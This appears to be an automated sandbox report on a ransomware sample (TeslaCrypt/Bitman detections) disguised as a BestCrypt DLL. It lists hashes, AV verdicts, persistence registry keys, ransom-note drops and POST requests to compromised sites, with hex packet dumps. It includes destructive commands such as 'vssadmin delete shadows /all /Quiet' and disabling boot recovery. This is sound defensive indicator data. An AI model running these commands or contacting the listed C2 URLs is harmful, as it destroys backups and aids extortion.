Analysis Date: 2016-02-14 12:03:43
MD5: e19d80a757580588957e947179d491d0
SHA1: 6865462b25e93d485fabd70598714bccb13efd05

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 5e892d41754a7ecb60095a42615688cd sha1: 2eade28b0a6e93f288c4559f5242e38cc769737a size: 42496
Section .rdata: md5: 67b40363cf6bc1034e622fde439ac3f1 sha1: 1b2445666f405e36b8712af514ef14ae8407689e size: 8704
Section .data: md5: af82be876e36e9a8fa61c2b5cb9d0821 sha1: 1b0a4386fba8116e8c755f2a1b8fca572f26fb11 size: 19968
Section .rsrc: md5: 5c42e7c955f7f13e157227eb0313f5e9 sha1: 598877dd6aa1ebb1cbc8ffc362ea595aaa08ce96 size: 189952
Timestamp: 2016-02-09 12:29:26
Version:
LegalCopyright: Copyright © 1995-2011
InternalName: BestCrypt
FileVersion: 4.02.5
CompanyName: Jetico, Inc.
ProductName: BestCrypt SHELLEXT Dynamic Link Library
ProductVersion: 4.02.5
FileDescription: BestCrypt Shell Extension DLL
OriginalFilename: BCShExt.DLL
Packer: Microsoft Visual C++ ?.?
PEhash: 50519ecc352f482d63f6bcad1d0b389a5eba9c5d
IMPhash: fc2a2932afa1f7ca2bd06365b610a4bc
AV CA (E-Trust Ino): Gen:Variant.Zusy.181392
AV Rising: No Virus
AV Mcafee: Ransomware-FDX!E19D80A75758
AV Avira (antivir): TR/Crypt.Xpack.445985
AV Twister: No Virus
AV Ad-Aware: Gen:Variant.Zusy.181392
AV Alwil (avast): Win32:Malware-gen
AV Eset (nod32): Win32/Kryptik.ENIU
AV Grisoft (avg): Generic_r.HGF
AV Symantec: No Virus
AV Fortinet: W32/Kryptik.ENFX!tr
AV BitDefender: Gen:Variant.Zusy.181392
AV K7: Trojan ( 004dddb21 )
AV Microsoft Security Essentials: Ransom:Win32/Tescrypt.E
AV MicroWorld (escan): Gen:Variant.Zusy.181392
AV MalwareBytes: Ransom.TeslaCrypt
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Emsisoft: Gen:Variant.Zusy.181392
AV Frisk (f-prot): W32/Agent.XL.gen!Eldorado
AV Ikarus: Trojan.Win32.Crypt
AV Zillya!: Trojan.Bitman.Win32.957
AV Kaspersky: Trojan-Ransom.Win32.Bitman.ijh
AV Trend Micro: No Virus
AV VirusBlokAda (vba32): No Virus
AV CAT (quickheal): Ransom.Crowti.WR7
AV BullGuard: Gen:Variant.Zusy.181392
AV Arcabit (arcavir): Gen:Variant.Zusy.181392
AV ClamAV: No Virus
AV Dr. Web: Trojan.Encoder.3817
AV F-Secure: Gen:Variant.Zusy.181392

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\klmwofd.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c DEL C:\686546~1.EXE
Creates Process: C:\Documents and Settings\Administrator\Application Data\klmwofd.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\686546~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\klmwofd.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\klmwofd.exe\\x00
Registry: HKEY_CURRENT_USER\Software\8E9F953E066506C\data ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\klmwofd.exe\\x00
Registry: HKEY_CURRENT_USER\Software\xxxsys\ID ➝ NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+yae.txt
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+yae.txt
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000080 (00128)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000090 (00144)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x000000a0 (00160)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000b0 (00176)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000c0 (00192)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000d0 (00208)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000e0 (00224)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000f0 (00240)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x00000100 (00256)   0a486f73 743a2068 6e622e6e 65740d0a   .Host: hnb.net..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   3634350d 0a436163 68652d43 6f6e7472   645..Cache-Contr
0x00000130 (00304)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000140 (00320)   64617461 3d304333 31303646 41373332   data=0C3106FA732
0x00000150 (00336)   36323032 33374142 38343635 39333139   620237AB84659319
0x00000160 (00352)   41443044 31364330 38303433 43443246   AD0D16C08043CD2F
0x00000170 (00368)   33364332 37383734 34464643 41314233   36C278744FFCA1B3
0x00000180 (00384)   38383132 42364146 41344237 37323745   8812B6AFA4B7727E
0x00000190 (00400)   43433936 38423442 44314641 30384141   CC968B4BD1FA08AA
0x000001a0 (00416)   32383835 46314546 35434641 30353939   2885F1EF5CFA0599
0x000001b0 (00432)   33423937 32374333 35443432 45343845   3B9727C35D42E48E
0x000001c0 (00448)   41424135 41364344 33463446 41303845   ABA5A6CD3F4FA08E
0x000001d0 (00464)   37374431 39323939 41384342 39303535   77D19299A8CB9055
0x000001e0 (00480)   37303838 39453333 41383437 44464535   70889E33A847DFE5
0x000001f0 (00496)   42364632 35443038 43324545 41313537   B6F25D08C2EEA157
0x00000200 (00512)   45413843 34344234 44323238 30324534   EA8C44B4D22802E4
0x00000210 (00528)   43354344 32323444 46324242 45333832   C5CD224DF2BBE382
0x00000220 (00544)   34433432 34354632 38443245 31313946   4C4245F28D2E119F
0x00000230 (00560)   46364533 42464132 42433330 39373144   F6E3BFA2BC30971D
0x00000240 (00576)   33303045 37443530 31433733 44373842   300E7D501C73D78B
0x00000250 (00592)   45423537 35343245 46413035 34323534   EB57542EFA054254
0x00000260 (00608)   37423432 31463435 42443439 38463532   7B421F45BD498F52
0x00000270 (00624)   33353936 35393743 38354536 35424543   3596597C85E65BEC
0x00000280 (00640)   45334432 43433644 39384332 31454542   E3D2CC6D98C21EEB
0x00000290 (00656)   35464634 35394135 44383443 34334334   5FF459A5D84C43C4
0x000002a0 (00672)   42444331 45373044 41424544 37464641   BDC1E70DABED7FFA
0x000002b0 (00688)   39414545 38443841 37464144 30323836   9AEE8D8A7FAD0286
0x000002c0 (00704)   41323442 38304338 38344338 42443031   A24B80C884C8BD01
0x000002d0 (00720)   44303146 36373538 39453331 41453546   D01F67589E31AE5F
0x000002e0 (00736)   30384643 42333646 33304435 41343837   08FCB36F30D5A487
0x000002f0 (00752)   33383032 30333532 42303943 31313337   38020352B09C1137
0x00000300 (00768)   37353239 43383744 38314330 34463533   7529C87D81C04F53
0x00000310 (00784)   39343645 38463938 41314131 32323946   946E8F98A1A1229F
0x00000320 (00800)   34363045 41363632 36313744 39433633   460EA662617D9C63
0x00000330 (00816)   32364341 34343434 35453432 42394536   26CA44445E42B9E6
0x00000340 (00832)   37393443 38464341 36413145 39333446   794C8FCA6A1E934F
0x00000350 (00848)   33393545 39434337 37354130 37354446   395E9CC775A075DF
0x00000360 (00864)   37393832 32324136 44393945 38454134   798222A6D99E8EA4
0x00000370 (00880)   46304430 35394341 41394632 37334434   F0D059CAA9F273D4
0x00000380 (00896)   37393435 44334532 30323444 43333544   7945D3E2024DC35D
0x00000390 (00912)   31304533 39384331 37443746 39434243   10E398C17D7F9CBC
0x000003a0 (00928)   31353237 31384342 42303734 34313246   152718CBB074412F
0x000003b0 (00944)   37303843 41454638 32314530 41353436   708CAEF821E0A546
0x000003c0 (00960)   46304542 44                           F0EBD

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2066 69726563 68656572   .Host: firecheer
0x00000100 (00256)   6c656164 6572732e 66720d0a 436f6e74   leaders.fr..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d304333 31303646 41373332 36323032   =0C3106FA7326202
0x00000150 (00336)   33374142 38343635 39333139 41443044   37AB84659319AD0D
0x00000160 (00352)   31364330 38303433 43443246 33364332   16C08043CD2F36C2
0x00000170 (00368)   37383734 34464643 41314233 38383132   78744FFCA1B38812
0x00000180 (00384)   42364146 41344237 37323745 43433936   B6AFA4B7727ECC96
0x00000190 (00400)   38423442 44314641 30384141 32383835   8B4BD1FA08AA2885
0x000001a0 (00416)   46314546 35434641 30353939 33423937   F1EF5CFA05993B97
0x000001b0 (00432)   32374333 35443432 45343845 41424135   27C35D42E48EABA5
0x000001c0 (00448)   41364344 33463446 41303845 37374431   A6CD3F4FA08E77D1
0x000001d0 (00464)   39323939 41384342 39303535 37303838   9299A8CB90557088
0x000001e0 (00480)   39453333 41383437 44464535 42364632   9E33A847DFE5B6F2
0x000001f0 (00496)   35443038 43324545 41313537 45413843   5D08C2EEA157EA8C
0x00000200 (00512)   34344234 44323238 30324534 43354344   44B4D22802E4C5CD
0x00000210 (00528)   32323444 46324242 45333832 34433432   224DF2BBE3824C42
0x00000220 (00544)   34354632 38443245 31313946 46364533   45F28D2E119FF6E3
0x00000230 (00560)   42464132 42433330 39373144 33303045   BFA2BC30971D300E
0x00000240 (00576)   37443530 31433733 44373842 45423537   7D501C73D78BEB57
0x00000250 (00592)   35343245 46413035 34323534 37423432   542EFA0542547B42
0x00000260 (00608)   31463435 42443439 38463532 33353936   1F45BD498F523596
0x00000270 (00624)   35393743 38354536 35424543 45334432   597C85E65BECE3D2
0x00000280 (00640)   43433644 39384332 31454542 35464634   CC6D98C21EEB5FF4
0x00000290 (00656)   35394135 44383443 34334334 42444331   59A5D84C43C4BDC1
0x000002a0 (00672)   45373044 41424544 37464641 39414545   E70DABED7FFA9AEE
0x000002b0 (00688)   38443841 37464144 30323836 41323442   8D8A7FAD0286A24B
0x000002c0 (00704)   38304338 38344338 42443031 44303146   80C884C8BD01D01F
0x000002d0 (00720)   36373538 39453331 41453546 30384643   67589E31AE5F08FC
0x000002e0 (00736)   42333646 33304435 41343837 33383032   B36F30D5A4873802
0x000002f0 (00752)   30333532 42303943 31313337 37353239   0352B09C11377529
0x00000300 (00768)   43383744 38314330 34463533 39343645   C87D81C04F53946E
0x00000310 (00784)   38463938 41314131 32323946 34363045   8F98A1A1229F460E
0x00000320 (00800)   41363632 36313744 39433633 32364341   A662617D9C6326CA
0x00000330 (00816)   34343434 35453432 42394536 37393443   44445E42B9E6794C
0x00000340 (00832)   38464341 36413145 39333446 33393545   8FCA6A1E934F395E
0x00000350 (00848)   39434337 37354130 37354446 37393832   9CC775A075DF7982
0x00000360 (00864)   32324136 44393945 38454134 46304430   22A6D99E8EA4F0D0
0x00000370 (00880)   35394341 41394632 37334434 37393435   59CAA9F273D47945
0x00000380 (00896)   44334532 30323444 43333544 31304533   D3E2024DC35D10E3
0x00000390 (00912)   39384331 37443746 39434243 31353237   98C17D7F9CBC1527
0x000003a0 (00928)   31384342 42303734 34313246 37303843   18CBB074412F708C
0x000003b0 (00944)   41454638 32314530 41353436 46304542   AEF821E0A546F0EB
0x000003c0 (00960)   442db2                                D-.

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a206c 61646965 73646568   .Host: ladiesdeh
0x00000100 (00256)   61616e2e 62650d0a 436f6e74 656e742d   aan.be..Content-
0x00000110 (00272)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000120 (00288)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000130 (00304)   61636865 0d0a0d0a 64617461 3d304333   ache....data=0C3
0x00000140 (00320)   31303646 41373332 36323032 33374142   106FA732620237AB
0x00000150 (00336)   38343635 39333139 41443044 31364330   84659319AD0D16C0
0x00000160 (00352)   38303433 43443246 33364332 37383734   8043CD2F36C27874
0x00000170 (00368)   34464643 41314233 38383132 42364146   4FFCA1B38812B6AF
0x00000180 (00384)   41344237 37323745 43433936 38423442   A4B7727ECC968B4B
0x00000190 (00400)   44314641 30384141 32383835 46314546   D1FA08AA2885F1EF
0x000001a0 (00416)   35434641 30353939 33423937 32374333   5CFA05993B9727C3
0x000001b0 (00432)   35443432 45343845 41424135 41364344   5D42E48EABA5A6CD
0x000001c0 (00448)   33463446 41303845 37374431 39323939   3F4FA08E77D19299
0x000001d0 (00464)   41384342 39303535 37303838 39453333   A8CB905570889E33
0x000001e0 (00480)   41383437 44464535 42364632 35443038   A847DFE5B6F25D08
0x000001f0 (00496)   43324545 41313537 45413843 34344234   C2EEA157EA8C44B4
0x00000200 (00512)   44323238 30324534 43354344 32323444   D22802E4C5CD224D
0x00000210 (00528)   46324242 45333832 34433432 34354632   F2BBE3824C4245F2
0x00000220 (00544)   38443245 31313946 46364533 42464132   8D2E119FF6E3BFA2
0x00000230 (00560)   42433330 39373144 33303045 37443530   BC30971D300E7D50
